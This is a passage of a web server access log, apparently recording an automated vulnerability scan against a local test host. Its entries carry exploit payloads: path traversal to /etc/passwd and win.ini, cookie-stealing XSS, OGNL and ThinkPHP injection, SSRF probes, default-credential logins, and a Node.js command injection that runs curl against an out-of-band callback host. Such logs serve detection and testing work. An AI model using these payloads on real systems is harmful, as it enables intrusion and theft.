AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.012","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apisix/admin/migrate/export HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/openstack/latest HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.259","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_notes/dwsync.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/ajax.php?page=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET ///../app.js HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.005","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"document=this.constructor.constructor(\x22return process\x22)().mainModule.require(\x22child_process\x22).execSync(\x22curl http://c9v8gc8smpv8b0ng0t00ake8bzhcki3gd.oast.online\x22)","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /checkValid HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /counters HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php?action=register HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/doenterpagevariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php?action=login&type=admin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/servlets/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/packages/security.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pma/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"s=phpinfo()&_method=__construct&filter=assert","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?s=index/index/index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.gitignore HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /flow/registries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/showLogon.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.axiom/accounts/do.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage.action?spaceKey=myproj HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upload.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Umbraco/feedproxy.aspx?url=http://c9v8gc8smpv8b0ng0t00a98ykoswg8a3z.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpversion.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/jsp/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/config/security.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/jobs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/.gitignore HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system-diagnostics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.zul HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/phpinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/templates2/viewpagetemplate.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 